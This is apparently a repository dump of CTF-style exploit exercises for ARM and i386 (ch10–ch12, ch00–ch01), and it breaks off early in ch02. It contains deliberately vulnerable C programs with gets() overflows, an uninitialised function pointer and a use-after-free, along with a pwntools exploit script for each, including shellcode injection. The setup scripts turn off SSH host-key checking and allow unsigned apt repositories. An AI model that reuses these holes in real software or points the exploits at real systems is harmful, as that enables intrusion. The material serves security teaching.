-------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 
| 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def send(r, msg_name, msg_content): 11 | r.sendline('send') 12 | r.recvuntil('Enter message name:') 13 | r.sendline(msg_name) 14 | r.recvuntil('Enter message content:') 15 | r.sendline(msg_content) 16 | 17 | 18 | def main(execution): 19 | challenge_name = 'ch10' 20 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 21 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 22 | 23 | shell_code = asm(shellcraft.arm.linux.sh()) 24 | 25 | r.recvuntil('exit - close program') 26 | send(r, msg_name='%3$x', msg_content="aaaa") 27 | 28 | r.recvuntil('name: \"') 29 | stack_ret = int(r.recvline().strip(), 16) + 0x38 30 | log.info('stack ret: {stack_ret}'.format(stack_ret=hex(stack_ret))) 31 | 32 | r.recvuntil('exit - close program') 33 | send(r, msg_name='angel', 34 | msg_content=cyclic(108) + pack(stack_ret+4, word_size=32) + shell_code) 35 | 36 | time.sleep(1) 37 | r.sendline('cat flag') 38 | r.recvuntil('zenysec') 39 | flag = 'zenysec' + r.recvuntil('\n') 40 | log.success('The flag is: {flag}'.format(flag=flag)) 41 | r.close() 42 | 43 | 44 | if __name__ == '__main__': 45 | parser = argparse.ArgumentParser(description='Exploit ch10') 46 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 47 | main(**vars(parser.parse_args())) 48 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch11/ch11: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch11/ch11
--------------------------------------------------------------------------------
/writeups/arm32v7/ch11/ch11.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
/* NOTE(review): the header names after each #include were lost when this page
 * was extracted. The code below calls stdio, string, stdlib and unistd
 * functions. */
#include
#include
#include

/* Size of each character field in the two structs below. */
#define BUF_SIZE 50

/* Heap-allocated message: two fixed 50-byte text fields. */
typedef struct{
    char name[BUF_SIZE];
    char content[BUF_SIZE];
} message;

/* Heap-allocated object that ends in a function pointer called by send(). */
typedef struct{
    char junk01[BUF_SIZE];
    char junk02[BUF_SIZE];
    void (*func_ptr)();
} important;

/* Run `cat flag` through system(). Not called directly anywhere in this file. */
void secret(){
    system("cat flag");
}

/*
 * Allocate a message and an `important` object on the heap, read the message
 * fields from stdin, call object_01->func_ptr if it is non-null, then echo
 * the message.
 *
 * Points a reviewer would raise, all deliberate for the exercise:
 *  - gets(msg->content) is unbounded, so input longer than the 50-byte field
 *    runs past the end of the msg allocation;
 *  - object_01 is never initialised (malloc() does not clear memory), yet its
 *    func_ptr is read and called;
 *  - neither malloc() result is checked and neither block is freed.
 * The bounded read is fgets(msg->content, sizeof msg->content, stdin), and
 * calloc() or an explicit func_ptr = NULL removes the uninitialised read.
 */
void send(){

    message* msg = (message*) malloc(sizeof(message));
    important* object_01 = (important*) malloc(sizeof(important));

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(msg->name, BUF_SIZE, stdin);
    printf("Enter message content:");
    gets(msg->content);

    /* Indirect call through a pointer this function never assigned. */
    if (object_01->func_ptr){
        object_01->func_ptr();
    }

    printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content);
}

/*
 * Print the menu, read one command line and dispatch it.
 *
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 * NOTE(review): the result of fgets() is not checked. At end of input the
 * zero-initialised buffer matches no command, so menu() returns 1 and the
 * loop in main() keeps running.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    /* fgets() keeps the newline, hence the "\n" in every comparison. */
    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Entry point: disable stdout buffering, pin the process UIDs, then run the
 * menu until it returns 0.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    /* Set real, effective and saved UID to the current effective UID.
     * NOTE(review): the return value of setresuid() is not checked. */
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch11!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}
--------------------------------------------------------------------------------
/writeups/arm32v7/ch11/compile.sh:
--------------------------------------------------------------------------------
# -no-pie fixes the load address; no stack-protector flag is given, so the
# compiler default applies. $1 is unquoted, so a directory argument
# containing spaces would be split into several words.
gcc $1/ch11.c -static -no-pie -o $1/ch11
--------------------------------------------------------------------------------
/writeups/arm32v7/ch11/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from ArmExploit import ArmExploit
import argparse

# Reset the pwntools context and select the ARM architecture.
context.clear(arch='arm')


def send(r, msg_name, msg_content):
    """Drive the target's 'send' menu command over the connection r.

    Sends the literal command 'send', waits for the name prompt and answers
    it with msg_name, then waits for the content prompt and answers it with
    msg_content. Nothing is returned.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch11 write-up against the bundled training binary.

    execution is forwarded unchanged to ArmExploit, which is imported from
    ArmExploit.py; the values it accepts are defined there, not here.
    One message is sent whose content is 154 bytes of cyclic() filler
    followed by the address of 'secret' packed as a 32-bit word. In ch11.c
    the content field is read with an unbounded gets() into a heap
    allocation, and send() then calls a function pointer taken from a second
    allocation that it never initialised.
    """
    challenge_name = 'ch11'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    # .r is the connection object used for all I/O below
    # (presumably a pwntools tube; confirm in ArmExploit.py).
    r = ArmExploit(challenge_name=challenge_name, execution=execution).r

    # The address is read from the local ELF's symbol table and used as-is,
    # which relies on the -no-pie build above. The filler length presumably
    # depends on this build's allocator layout.
    secret_func_addr = ELF(challenge_name).functions['secret'].address
    r.recvuntil('exit - close program')
    send(r, msg_name='angel', msg_content=cyclic(154) + pack(secret_func_addr, word_size=32))

    # The flag file in this repository is the placeholder zenysec{flag};
    # the prefix is consumed by recvuntil() and re-attached by hand.
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    # -e/--execution is required and is passed to main() as `execution`.
    parser = argparse.ArgumentParser(description='Exploit ch11')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))
--------------------------------------------------------------------------------
/writeups/arm32v7/ch11/flag:
--------------------------------------------------------------------------------
zenysec{flag}
--------------------------------------------------------------------------------
/writeups/arm32v7/ch12/ch12:
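--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch12/ch12
--------------------------------------------------------------------------------
/writeups/arm32v7/ch12/ch12.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// NOTE(review): the header names after #include were lost when this page was
// extracted; the three lines below are reproduced as they appear.
#include
#include
#include

#define BUF_SIZE 50

typedef struct{
    char name[BUF_SIZE];
    char content[BUF_SIZE];
} message;

typedef struct{
    char junk01[BUF_SIZE];
    char junk02[BUF_SIZE];
    void (*func_ptr)();
} important;

/* Single global worker; NULL until create_worker() runs. */
important* work;

void func(){
    printf("[*] Working\n");
}

/* Prints the flag file; nothing in this program calls it directly. */
void secret(){
    system("cat flag");
}

/* Allocates the worker, points it at func() and prints its heap address. */
void create_worker(){
    work = (important*) malloc(sizeof(important));
    work->func_ptr = func;
    printf("Worker Created in %p\n", work);
}

/*
 * Calls through work->func_ptr with no check that `work` is non-NULL or
 * still allocated (deliberate: see free_worker()).
 */
void start_worker(){
    work->func_ptr();
}

/*
 * Frees the worker but leaves `work` pointing at the freed chunk, so a later
 * start_worker() is a use-after-free and a second free_worker() is a double
 * free. Setting work = NULL after free() and checking it in start_worker()
 * would close both.
 */
void free_worker(){
    free(work);
}

/*
 * Allocates a message, prints its heap address and fills it from stdin.
 * gets() has no length limit, so content can be written past the allocation.
 * The message is never freed. Deliberately unsafe training target.
 */
void send(){
    message* msg = (message*) malloc(sizeof(message));
    printf("Message Created in %p\n", msg);

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(msg->name, BUF_SIZE, stdin);
    printf("Enter message content:");
    gets(msg->content);
    printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content);
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("create_worker - create worker\n");
    printf("start_worker - run worker\n");
    printf("free_worker - free current worker\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "create_worker\n") == 0){
        create_worker();
        return 1;
    }
    else if (strcmp(buffer, "start_worker\n") == 0){
        start_worker();
        return 1;
    }
    else if (strcmp(buffer, "free_worker\n") == 0){
        free_worker();
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Disables stdout buffering, sets real/effective/saved UID to the current
 * effective UID, then loops on menu() until it returns 0.
 * The return value of setresuid() is not checked.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch12!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/arm32v7/ch12/compile.sh:
--------------------------------------------------------------------------------
# $1 is the directory holding ch12.c; it is expanded unquoted.
gcc $1/ch12.c -static -no-pie -o $1/ch12

--------------------------------------------------------------------------------
/writeups/arm32v7/ch12/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from ArmExploit import ArmExploit
import argparse

context.clear(arch='arm')


def free_worker(r):
    """Send the 'free_worker' menu command on tube `r`."""
    r.sendline('free_worker')


def start_worker(r):
    """Send the 'start_worker' menu command on tube `r`."""
    r.sendline('start_worker')


def create_worker(r):
    """Send the 'create_worker' menu command on tube `r`."""
    r.sendline('create_worker')


def send(r, msg_name, msg_content):
    """Walk the target's 'send' menu entry on tube `r`.

    Selects 'send', waits for each prompt, then submits `msg_name` and
    `msg_content` as one line each.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch12 write-up against the target selected by `execution`.

    The command order (create, free, send, start) exercises the dangling
    `work` pointer that ch12.c's free_worker() leaves behind. The 50-byte
    filler matches the distance from `content` to the end of the message
    struct; whether the message reuses the freed worker chunk depends on
    the allocator (presumably it does in this static build).

    NOTE(review): `'zenysec' + r.recvuntil('\n')` raises TypeError on
    Python 3 pwntools, where the tube returns bytes.
    """
    challenge_name = 'ch12'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = ArmExploit(challenge_name=challenge_name, execution=execution).r

    secret_func_addr = ELF(challenge_name).functions['secret'].address
    r.recvuntil('exit - close program')

    create_worker(r)
    free_worker(r)
    send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32))
    start_worker(r)

    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch12')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/arm32v7/ch12/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/arm32v7/debug.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash

# Print the banner and validate the two arguments: executable path and port.
function welcome(){
    echo "** ZenySec Exercises **"

    if [ -z "$1" ] || [ -z "$2" ] ; then
        echo "usage: ./debug.sh arm-executable port"
        exit 1
    fi

    # The port is spliced into a sed expression and a command line further
    # down, so accept digits only.
    case "$2" in
        *[!0-9]*)
            echo "usage: ./debug.sh arm-executable port"
            exit 1
            ;;
    esac
}

# Stop any running qemu-arm-static and start a new one with its gdb stub on
# port $2 in a separate terminal window.
function run_gdb_server(){
    echo "[*] Killing running gdb-server..."
    # The earlier `ps -A | grep ... | cut -d' ' -f1` pipeline returned an empty
    # field whenever ps padded the PID with leading spaces, so kill received no
    # PID. pkill matches on the process name; a non-zero status only means
    # nothing was running.
    pkill -9 qemu-arm-static || true

    echo "[*] Executing gdb-server for $1 on port $2..."
    #x-terminal-emulator -e "qemu-arm-static -g $2 $1"
    gnome-terminal -e "qemu-arm-static -g $2 $1"
}

# Point gdb_plugin.sh at port $2 and open gdb-multiarch on the executable.
function run_gdb_attach(){
    echo "[*] Executing gdb-multiarch for $1 on port $2..."
    echo "[*] Use xhelp in gdb for help..."
    # Rewrites every "localhost:<digits>" in gdb_plugin.sh in place, including
    # the one inside the xhelp text.
    sed -i "s/localhost:[0-9]*/localhost:$2/g" gdb_plugin.sh
    gdb-multiarch "$1" -x gdb_plugin.sh
}


function main(){
    welcome "$1" "$2"
    run_gdb_server "$1" "$2"
    run_gdb_attach "$1" "$2"
}

main "$1" "$2"
echo "[*] Done!"

--------------------------------------------------------------------------------
/writeups/arm32v7/gdb_plugin.sh:
--------------------------------------------------------------------------------
# gdb command file (loaded with `gdb-multiarch -x`), not a shell script.
# debug.sh rewrites the localhost port below before each session.
define xhelp
    printf "---------------\n"
    printf "\txt - target remote localhost:20000\n"
    printf "---------------\n"
    printf "\txarch - set architecture arm\n"
    printf "---------------\n"
end

define xarch
    set architecture arm
end

define xt
    target remote localhost:20000
end


--------------------------------------------------------------------------------
/writeups/arm32v7/remote.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash

# Print the banner, validate the project path and put it on PYTHONPATH.
function welcome(){
    echo "** ZenySec Exercises **"

    if [ -z "$1" ]; then
        echo "usage: ./remote.sh project_path (writeups/arm32v7)"
        exit 1
    fi

    # Resolve to an absolute path: the exploit scripts run from inside each
    # chNN directory, where a relative PYTHONPATH entry would no longer find
    # ArmExploit.py.
    local project_dir
    project_dir=$(cd "$1" && pwd) || exit 1
    export PYTHONPATH="$project_dir${PYTHONPATH:+:$PYTHONPATH}"
}

# Run every chNN/exploit.py under the project path in remote mode.
function remote(){
    echo "[*] Testing exploits remote..."
    local project_dir challenge_dir
    project_dir=$(cd "$1" && pwd) || return 1
    # Previously the loop listed the current directory but changed into
    # "$1/<name>" and back with `cd ..`, so a relative project path stopped
    # resolving after the first challenge. Iterate the project's own chNN
    # directories and run each script in a subshell instead.
    for challenge_dir in "$project_dir"/ch*/; do
        [ -f "$challenge_dir/exploit.py" ] || continue
        ( cd "$challenge_dir" && python exploit.py -e remote )
    done
}

function main(){
    welcome "$1"
    remote "$1"
}

main "$1"
echo "[*] Done!"

--------------------------------------------------------------------------------
/writeups/arm32v7/run.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash

# Print the banner and require the executable path.
function welcome(){
    echo "** ZenySec Exercises **"

    if [ -z "$1" ]; then
        echo "usage: ./run.sh arm-executable"
        exit 1
    fi
}

# Run the ARM executable under user-mode QEMU.
function run_exe(){
    echo "[*] Executing $1..."
    qemu-arm-static "$1"
}

function main(){
    welcome "$1"
    run_exe "$1"
}

main "$1"
echo "[*] Done!"

--------------------------------------------------------------------------------
/writeups/arm32v7/setup.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash

# Print the banner; require root and a user name argument.
function welcome(){
    echo "** ZenySec Exercises **"

    if [[ $EUID -ne 0 ]]; then
        echo "This script must be run as root"
        exit 1
    fi

    if [ -z "$1" ]; then
        echo "usage: ./setup.sh user_name"
        exit 1
    fi
}

# Add the pwntools binutils PPA and install the ARM binutils.
function download_arm_binutils(){
    echo "[*] Downloading arm-binutils..."
    if ! grep -q pwntools /etc/apt/sources.list ; then
        echo "deb http://ppa.launchpad.net/pwntools/binutils/ubuntu trusty bionic main" >> /etc/apt/sources.list
    fi
    # NOTE(review): this runs as root, fetches the PPA over plain http and
    # tells apt to accept unsigned repositories, so package integrity is not
    # verified for anything apt refreshes in this call. Importing the PPA's
    # signing key and dropping both -o options is the safer setup; left as is
    # because the key is not part of this repository.
    apt -o Acquire::AllowInsecureRepositories=true -o Acquire::AllowDowngradeToInsecureRepositories=true update
    apt-get install binutils-arm-linux-gnu
}

function download_gdb_multi_arch(){
    echo "[*] Downloading gdb-multiarch..."
    apt-get install -y gdb-multiarch
}

function download_qemu(){
    echo "[*] Downloading QEMU..."
    apt-get install -y qemu
    apt-get install -y qemu-user-static
}

function download_kpartx(){
    echo "[*] Downloading kpatx..."
    apt-get install -y kpartx
}

# This function used to be a second definition of download_kpartx, which
# replaced the one above, so kpartx was never installed. It now has its own
# name and download() calls both.
function download_sshpass(){
    echo "[*] Downloading sshpass..."
    apt-get install -y sshpass
}

# Copy the helper scripts from the exercise server into the current directory.
function download_tools(){
    echo "[*] Downloading tools..."
    # NOTE(review): host key checking is switched off and the password is on
    # the command line, so the server is not authenticated and the files that
    # arrive here (later marked executable) are only as trustworthy as the
    # network path. Pinning the host key in a known_hosts file would fix that.
    sshpass -p 'welcome' scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no welcome@exercises-arm32v7.zenysec.com:/home/welcome/\{debug.sh,gdb_plugin.sh,run.sh,remote.sh\} .
}

# Copy source, binary and compile.sh for every challenge into ./chNN/.
function download_challenges(){
    echo "[*] Downloading challenges..."

    for i in ch00 ch01 ch02 ch03 ch04 ch05 ch06 ch07 ch08 ch09 ch10 ch11 ch12; do
        mkdir -p $i
        # Same unauthenticated-host caveat as in download_tools.
        sshpass -p $i scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $i@exercises-arm32v7.zenysec.com:/home/$i/\{$i.c,$i,compile.sh\} $i/
    done
}

# Install every dependency, then fetch tools and challenges.
function download(){
    apt-get update

    download_qemu
    download_kpartx
    # sshpass must be present before the two scp-based steps below.
    download_sshpass
    download_gdb_multi_arch
    download_tools
    download_challenges
    download_arm_binutils

}

# Hand the downloaded files to user $1.
function change_permissions(){
    chgrp -R "$1" ch*/
    chown -R "$1" ch*/
    # Was 777; the files are owned by $1 after the chown above, so nobody else
    # needs write access to the challenge binaries and scripts.
    chmod 755 ch*/*

    chgrp -R "$1" *.sh
    chown -R "$1" *.sh
    chmod +x *.sh
}

function main(){
    welcome "$1"
    download "$1"
    change_permissions "$1"
}

main "$1"
echo "[*] Done!"

--------------------------------------------------------------------------------
/writeups/i386/I386Exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *


class I386Exploit(object):
    """Open a pwntools tube to one i386 challenge and expose it as `self.r`.

    `execution` selects how the challenge is started:
      'debug'  - local process with gdb attached, scripted by ../gdb_plugin.sh
      'local'  - local process
      'remote' - process started over SSH on exercises-i386.zenysec.com,
                 logging in with the challenge name as user and password
    Any other value is reported through log.error() and raises.
    """

    def __init__(self, challenge_name, execution, remote_port=20000):
        self.r = None
        if execution == 'debug':
            r = process(
                ['./{challenge_name}'.format(challenge_name=challenge_name)])
            # The gdb script path is relative to the current directory, so this
            # mode has to be started from inside a chNN directory.
            # NOTE(review): gdbscript receives an open file object; confirm the
            # installed pwntools accepts that rather than a string.
            gdb.attach(r, gdbscript=open('../gdb_plugin.sh'))
            log.info('xhelp - help in gdb')
        elif execution == 'local':
            r = process(['./{challenge_name}'.format(challenge_name=challenge_name)])
        elif execution == 'remote':
            ssh_client = ssh(user=challenge_name, host='exercises-i386.zenysec.com', port=remote_port,
                             password=challenge_name)
            r = ssh_client.process(['./{challenge_name}'.format(challenge_name=challenge_name)])
        else:
            # NOTE(review): pwntools' log.error() presumably raises on its own,
            # which would make the explicit raise below unreachable.
            log.error('Unknown execution type {execution}'.format(execution=execution))
            raise Exception('I386Exploit: Unknown execution type {execution}'.format(execution=execution))
        self.r = r
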
--------------------------------------------------------------------------------
/writeups/i386/I386Exploit.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/I386Exploit.pyc
--------------------------------------------------------------------------------
/writeups/i386/ch00/ch00:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch00/ch00
--------------------------------------------------------------------------------
/writeups/i386/ch00/ch00.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// NOTE(review): the header names after #include were lost when this page was
// extracted; the three lines below are reproduced as they appear.
#include
#include
#include

#define BUF_SIZE 50

/* Prints the flag file; reached only when send() sees value == 0x7. */
void secret(){
    system("cat flag");
}

/*
 * Reads a message name and content and prints them back.
 *
 * Training target, deliberately unsafe: gets() has no length limit, and
 * `value` is the struct member directly after content[BUF_SIZE], so the
 * byte following a 50-byte content lands in `value`. The program itself
 * never assigns anything but 0 to it. Reading with
 * fgets(l.content, BUF_SIZE, stdin) would keep input inside the array.
 */
void send(){
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        char value;
    };
    struct locals l = {.value = 0, .content = {0}, .name = {0}};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
    if(l.value == 0x7){
        secret();
    }
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Disables stdout buffering, sets real/effective/saved UID to the current
 * effective UID, then loops on menu() until it returns 0.
 * The return value of setresuid() is not checked.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch00!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch00/compile.sh:
--------------------------------------------------------------------------------
# $1 is the directory holding ch00.c; it is expanded unquoted.
gcc $1/ch00.c -static -no-pie -o $1/ch00

--------------------------------------------------------------------------------
/writeups/i386/ch00/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's 'send' menu entry on tube `r`.

    Selects 'send', waits for each prompt, then submits `msg_name` and
    `msg_content` as one line each.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch00 write-up against the target selected by `execution`.

    The content line is 50 filler bytes (BUF_SIZE in ch00.c) followed by
    the value 0x7 packed as a 32-bit word, matching the `value == 0x7`
    check in the target's send().

    NOTE(review): `'zenysec' + r.recvuntil('\n')` raises TypeError on
    Python 3 pwntools, where the tube returns bytes.
    """
    challenge_name = 'ch00'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    r.recvuntil('exit - close program')
    send(r, msg_name='angel', msg_content=cyclic(50) + pack(0x7, word_size=32))
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch00')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch00/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch01/ch01:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch01/ch01
--------------------------------------------------------------------------------
/writeups/i386/ch01/ch01.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// NOTE(review): the header names after #include were lost when this page was
// extracted; the three lines below are reproduced as they appear.
#include
#include
#include

#define BUF_SIZE 50

/* Prints the flag file; reached only when send() sees admin == "true". */
void secret(){
    system("cat flag");
}

/*
 * Reads a message name and content and prints them back.
 *
 * Training target, deliberately unsafe: gets() has no length limit, and
 * `admin` is the struct member directly after content[BUF_SIZE], so input
 * longer than the array replaces the "false" the program stored there.
 * Authorisation state kept next to an unbounded input buffer is the flaw;
 * fgets(l.content, BUF_SIZE, stdin) would keep input inside the array.
 */
void send(){
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        char admin[BUF_SIZE];
    };
    struct locals l = {.name = {0}, .content = {0}, .admin = "false"};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
    if(!(strcmp(l.admin, "true"))){
        secret();
    }
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Disables stdout buffering, sets real/effective/saved UID to the current
 * effective UID, then loops on menu() until it returns 0.
 * The return value of setresuid() is not checked.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch01!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch01/compile.sh:
--------------------------------------------------------------------------------
# $1 is the directory holding ch01.c; it is expanded unquoted.
gcc $1/ch01.c -static -no-pie -o $1/ch01

--------------------------------------------------------------------------------
/writeups/i386/ch01/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's 'send' menu entry on tube `r`.

    Selects 'send', waits for each prompt, then submits `msg_name` and
    `msg_content` as one line each.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch01 write-up against the target selected by `execution`.

    The content line is 50 filler bytes (BUF_SIZE in ch01.c) followed by
    the string 'true', matching the strcmp() on `admin` in the target's
    send().

    NOTE(review): `cyclic(50) + 'true'` and `'zenysec' + r.recvuntil('\n')`
    both mix str with pwntools byte strings and raise TypeError on
    Python 3; the script looks written for Python 2.
    """
    challenge_name = 'ch01'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    r.recvuntil('exit - close program')
    send(r, msg_name='angel', msg_content=cyclic(50) + 'true')
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch01')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch01/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch02/ch02:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch02/ch02
--------------------------------------------------------------------------------
/writeups/i386/ch02/ch02.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// NOTE(review): the header names after #include were lost when this page was
// extracted; the three lines below are reproduced as they appear.
#include
#include
#include

#define BUF_SIZE 50

